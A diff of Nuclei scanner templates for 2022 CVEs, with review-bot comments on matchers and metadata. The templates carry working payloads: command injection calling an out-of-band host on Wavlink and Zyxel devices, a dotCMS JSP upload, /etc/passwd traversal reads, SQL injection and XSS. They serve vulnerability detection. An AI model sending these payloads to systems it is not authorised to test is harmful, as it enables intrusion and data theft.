a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml b/nuclei-templates/CVE-2022/CVE-2022-2487.yaml deleted file mode 100644 index 899076eb8b..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2022-2487 -info: - name: Wavlink Nightled.cgi - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 - - https://vuldb.com/?id.204538 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2487 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast -variables: - cmd: "id" -requests: - - raw: - - | - @timeout: 10s - POST /cgi-bin/nightled.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - page=night_led&start_hour=;{{cmd}}; - matchers-condition: and - matchers: - - type: word - part: body - words: - - "uid=" - - "gid=" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2488.yaml b/nuclei-templates/CVE-2022/CVE-2022-2488.yaml new file mode 100644 index 0000000000..5c0bb7ac8b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2488.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2022-2488 +info: + name: Wavlink Touchlist_sync.cgi - Remote Code Execution + author: For3stCo1d + severity: critical + description: | + A vulnerability was found in WAVLINK WN535K2 and WN535K3 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/touchlist_sync.cgi. The manipulation of the argument IP leads to os command injection. The exploit has been disclosed to the public and may be used. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 + - https://vuldb.com/?id.204539 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2488 + cwe-id: CWE-78 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve,cve2022,iot,wavlink,router,rce,oast +requests: + - raw: + - | + GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - type: status + status: + - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml new file mode 100644 index 0000000000..5ad8567611 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml 
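Review bot: The `matchers-condition: and` gates the interactsh hit on `status: 500`, so a firmware build that returns 200 after running the injected `IP` value is reported as not vulnerable even though the out-of-band interaction already proves command injection; either drop the status matcher or record why 500 is expected, e.g. `# 500 observed on WN535K2/WN535K3 because the CGI aborts after the injected command`. The rest of the template is otherwise the request previously filed under CVE-2022-2486, so a short comment noting that the touchlist_sync.cgi probe now lives here would help anyone comparing histories.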
@@ -0,0 +1,39 @@ +id: CVE-2022-26159 + +info: + name: Ametys CMS Information Disclosure + author: Remi Gascou (podalirius) + severity: medium + description: "Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords." + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 + - https://podalirius.net/en/cves/2022-26159/ + tags: cve,cve2022,plugin,ametys,cms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2022-26159 + +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' + + matchers-condition: and + matchers: + - type: word + words: + - '' + - '' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-26233.yaml b/nuclei-templates/CVE-2022/CVE-2022-26233.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-26233.yaml rename to nuclei-templates/CVE-2022/CVE-2022-26233.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-26352.yaml b/nuclei-templates/CVE-2022/CVE-2022-26352.yaml deleted file mode 100644 index f75c2c3155..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26352.yaml +++ /dev/null 
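Review bot: As rendered here both `words` entries of the first matcher are empty strings (`- ''`); if that is an extraction artefact of angle-bracket XML tags the file is fine, but if the file really contains empty words the matcher is satisfied by any body and the `text/xml` and status checks become the only evidence, so this should be confirmed against the stored file. `classification` has no `cwe-id`; CWE-200 would fit the information-disclosure class the description gives. `cvss-score: 5.30` uses a different format from the `x.y` scores in the other templates of this commit.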
@@ -1,41 +0,0 @@ -id: CVE-2022-26352 -info: - name: DotCMS - Arbitrary File Upload - author: h1ei1 - severity: critical - description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. - reference: - - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/ - - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352 - - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html - classification: - cve-id: CVE-2022-26352 - tags: cve,cve2022,rce,dotcms -requests: - - raw: - - | - POST /api/content/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3 - - --------------------------aadc326f7ae3eac3 - Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp" - Content-Type: text/plain - - <% - out.println("CVE-2022-26352"); - %> - --------------------------aadc326f7ae3eac3-- - - | - GET /{{randstr}}.jsp HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2, "CVE-2022-26352")' - - 'status_code_2 == 200' - condition: and - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26564.yaml b/nuclei-templates/CVE-2022/CVE-2022-26564.yaml deleted file mode 100644 index f95d08a217..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26564.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: CVE-2022-26564 -info: - name: HotelDruid Hotel Management Software 3.0.3 XSS - author: alexrydzak - severity: medium - description: | - HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability. - reference: - - https://rydzak.me/2022/04/cve-2022-26564/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-26564 - - https://www.hoteldruid.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-26564 - cwe-id: CWE-79 - metadata: - shodan-query: http.favicon.hash:-1521640213 - tags: cve,cve2022,hoteldruid,xss -requests: - - method: GET - path: - - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22>' - - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22>&idclienti=1' - - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22>' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "HotelDruid" - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26960.yaml b/nuclei-templates/CVE-2022/CVE-2022-26960.yaml new file mode 100644 index 0000000000..21b4f71879 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26960.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2022-26960 +info: + name: elFinder <=2.1.60 - Local File Inclusion + author: pikpikcu + severity: critical + description: | + elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + reference: + - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html + - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db + - https://www.synacktiv.com/publications.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-26960 + cwe-id: CWE-22 + metadata: + verified: true + tags: cve,cve2022,lfi,elfinder +requests: + - raw: + - | + GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28079.yaml b/nuclei-templates/CVE-2022/CVE-2022-28079.yaml deleted file mode 100644 index 8124852465..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-28079.yaml +++ /dev/null 
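Review bot: The request hard-codes both the install location `/elfinder/php/connector.minimal.php` and the absolute document-root path `/var/www/html/elfinder/files/`, so any deployment that differs in either will be reported as clean; those assumptions should be stated in `description` or `metadata` (e.g. `# assumes the default /var/www/html/elfinder layout — adjust for other roots`) so operators understand the false-negative risk. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET serves no purpose and can be dropped. `verified: true` is a bare boolean while the other templates in this commit quote the value.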
@@ -1,38 +0,0 @@ -id: CVE-2022-28079 -info: - name: College Management System - SQL Injection - author: ritikchaddha - severity: high - description: | - College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter. - reference: - - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated - - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f - - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 - - https://code-projects.org/college-management-system-in-php-with-source-code/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28079 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,cms,collegemanagement -variables: - num: "999999999" -requests: - - raw: - - | - POST /admin/asign-single-student-subjects.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# - matchers-condition: and - matchers: - - type: word - words: - - '{{md5({{num}})}}' - - type: status - status: - - 302 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28080.yaml b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml new file mode 100644 index 0000000000..dc59377c75 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml 
@@ -0,0 +1,65 @@ +id: CVE-2022-28080 +info: + name: Royal Event - SQL Injection + author: lucasljm2001,ekrause,ritikchaddha + severity: high + description: | + Detects an SQL Injection vulnerability in Royal Event System + reference: + - https://www.exploit-db.com/exploits/50934 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + tags: cve,cve2022,sqli,authenticated,cms,royalevent +requests: + - raw: + - | + POST /royal_event/ HTTP/1.1 + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD + + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" + + + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + - | + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD + + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="todate" + + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="search" + + 3 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' 
+ - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29298.yaml b/nuclei-templates/CVE-2022/CVE-2022-29298.yaml new file mode 100644 index 0000000000..191cb6e9b8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-29298.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-29298 +info: + name: SolarView Compact 6.00 - Directory Traversal + author: ritikchaddha + severity: high + description: SolarView Compact ver.6.00 allows attackers to access sensitive files via directory traversal. + reference: + - https://www.exploit-db.com/exploits/50950 + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view + - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29298 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,lfi,solarview +requests: + - method: GET + path: + - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/cve-2022-29303.yaml b/nuclei-templates/CVE-2022/CVE-2022-29303.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-29303.yaml rename to nuclei-templates/CVE-2022/CVE-2022-29303.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml new file mode 100644 index 0000000000..f6b5e980e8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml 
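Review bot: The login request hard-codes `Content-Length: 353` for a multipart body whose length changes with the substituted `{{username}}` and `{{password}}`, so the declared length will not match what is actually sent unless the engine overwrites it; drop the header and let the length be computed. `classification` has no `cwe-id`, although every sibling SQLi template in this commit carries `cwe-id: CWE-89`. The description `Detects an SQL Injection vulnerability in Royal Event System` names neither the injected `todate` parameter of `btndates_report.php` nor the fact that valid credentials are required, which the `authenticated` tag implies; the referenced advisory should supply both.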
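Review bot: The `reference` list contains the same Google Drive file twice (`.../view` and `.../view?usp=sharing`), and a Drive link is not a durable citation; keep one entry and rely on the exploit-db and NVD references. The `%00.jpg` suffix on the traversal path depends on null-byte truncation, which current PHP runtimes no longer perform, so a comment such as `# relies on null-byte truncation; newer PHP builds answer with a clean 404 here` would stop a negative result from being misread as "patched".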
@@ -0,0 +1,37 @@ +id: CVE-2022-29548 +info: + name: WSO2 Management Console - Reflected XSS + author: edoardottt + severity: medium + description: | + A reflected XSS issue exists in the Management Console of several WSO2 products. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"carbon/admin/login" + verified: "true" + tags: cve,cve2022,wso2,xss +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30489.yaml b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml new file mode 100644 index 0000000000..fa2302aea9 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30489.yaml 
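Review bot: The body match `CARBON.showWarningDialog('???');alert(document.domain)//???` hinges on the literal `???` around the reflected `errorCode`, and nothing in the template explains where those characters come from; a comment like `# '???' appears to be the Carbon i18n fallback wrapping an unknown errorCode key - confirm before changing this match` would keep a later maintainer from "fixing" it. The description `A reflected XSS issue exists in the Management Console of several WSO2 products` names no product or version even though the WSO2 advisory in the references is product- and version-specific; copying that list into the description makes triage possible from the template alone.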
@@ -0,0 +1,42 @@ +id: CVE-2022-30489 +info: + name: Wavlink Wn535g3 - POST XSS + author: For3stCo1d + severity: medium + description: | + WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. + reference: + - https://github.com/badboycxcc/XSS-CVE-2022-30489 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/badboycxcc/XSS + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-30489 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: xss,cve2022,wavlink,cve,router,iot +requests: + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'parent.location.replace("http://")' + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml b/nuclei-templates/CVE-2022/CVE-2022-30525.yaml deleted file mode 100644 index f1fe6f3456..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-30525.yaml +++ /dev/null 
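Review bot: The first word matcher lists an empty string `''` ahead of `parent.location.replace("http://")` under `condition: and`; an empty word is contained in every body, so the `and` collapses to the second word alone and the `hostname` reflection is never actually verified. If the empty entry is an artefact of markup being stripped on this page (the `hostname=")` payload looks truncated the same way), the committed file should be checked; otherwise the matcher needs the real reflected marker. The request also sends a fixed `key=M27234733` and `password=63a36bceec2d3bba30d8611c323f4cda`, and a comment stating why those fixed values are needed for the login page to render the reflection would help the next reader.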
@@ -1,39 +0,0 @@ -id: CVE-2022-30525 -info: - name: Zyxel Firewall - OS Command Injection - author: h1ei1,prajiteshsingh - severity: critical - description: | - An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. - reference: - - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - - https://github.com/rapid7/metasploit-framework/pull/16563 - - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml - - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-30525 - cwe-id: CWE-78 - metadata: - shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - tags: rce,zyxel,cve,cve2022,firewall,unauth,kev -requests: - - raw: - - | - POST /ztp/cgi-bin/handler HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - type: status - status: - - 500 - -# Enhanced by mp 
on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml deleted file mode 100644 index 2c50f208fc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-30777 -info: - name: Parallels H-Sphere - Cross Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter. - reference: - - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - - https://en.wikipedia.org/wiki/H-Sphere - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30777 - cwe-id: CWE-79 - metadata: - shodan-query: title:"h-sphere" - verified: "true" - tags: cve,cve2022,parallels,hsphere,xss -requests: - - method: GET - path: - - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - '"><script>alert(document.domain)</script>' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml new file mode 100644 index 0000000000..c09b86777f --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml 
@@ -0,0 +1,36 @@ +id: CVE-2022-31373 +info: + name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) + author: ritikchaddha + severity: medium + description: | + SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. + reference: + - https://github.com/badboycxcc/SolarView_Compact_6.0_xss + - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-31373 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,xss,solarview +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/Solar_AiConf.php/"><script>alert(document.domain)</script>' + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32007.yaml b/nuclei-templates/CVE-2022/CVE-2022-32007.yaml new file mode 100644 index 0000000000..cc29bbd8fc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32007.yaml 
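Review bot: The name says `SolarView Compact 6.00` while the description says `v6.0`, and the sibling CVE-2022-29298 template in this commit writes `ver.6.00`; the three should agree on one version string. `Cross-Site Scripting(XSS)` is also missing the space before the parenthesis and departs from the `Reflected XSS` / `Cross Site Scripting` forms used elsewhere in the set; `name: SolarView Compact 6.00 - Cross-Site Scripting (XSS)` keeps the style consistent.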
@@ -0,0 +1,37 @@ +id: CVE-2022-32007 +info: + name: Complete Online Job Search System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/admin/company/index.php?view=edit&id=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32007 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32007 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,eris,authenticated +variables: + num: "999999999" +requests: + - raw: + - | + POST /admin/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user_email={{username}}&user_pass={{password}}&btnLogin= + - | + GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32018.yaml b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml new file mode 100644 index 0000000000..1fa8cbf9bc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32018.yaml 
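Review bot: The description places the injection at `/eris/admin/company/index.php?view=edit&id=`, but the requests go to `/admin/login.php` and `/admin/company/index.php` with no `/eris/` prefix, so either the description or the paths is wrong and an install under the documented `/eris/` root is never reached; the CVE-2022-32018 hunk below has the same `/eris/index.php` vs `/index.php` mismatch. Unlike the CVE-2022-32024 and CVE-2022-32028 templates in this commit, `matchers` here has no `matchers-condition: and` and no status matcher, so a page that merely echoes the md5 value on an error response would still count as a hit; adding `- type: status` / `status:` / `- 200` brings it in line with the siblings. `verified: "true"` is asserted without any `shodan-query` or other fingerprint, which the rest of the set provides.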
@@ -0,0 +1,29 @@ +id: CVE-2022-32018 +info: + name: Complete Online Job Search System v1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=hiring&search=. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32018 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli +variables: + num: "999999999" +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32024.yaml b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml new file mode 100644 index 0000000000..644f0f8df2 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32024.yaml 
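Review bot: `tags: cve,cve2022,sqli` carries no product tag, while the companion CVE-2022-32007 template for the same application uses `eris`; add `eris` so both templates can be selected together. The CVSS vector says `PR:H`, but the request is a single GET with no login step and the tags omit `authenticated`, so either the vector or the request model is inconsistent and a comment should say which is intended. The description path `/eris/index.php?q=hiring` also does not match the requested `/index.php?q=hiring`, the same mismatch noted on CVE-2022-32007 above.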
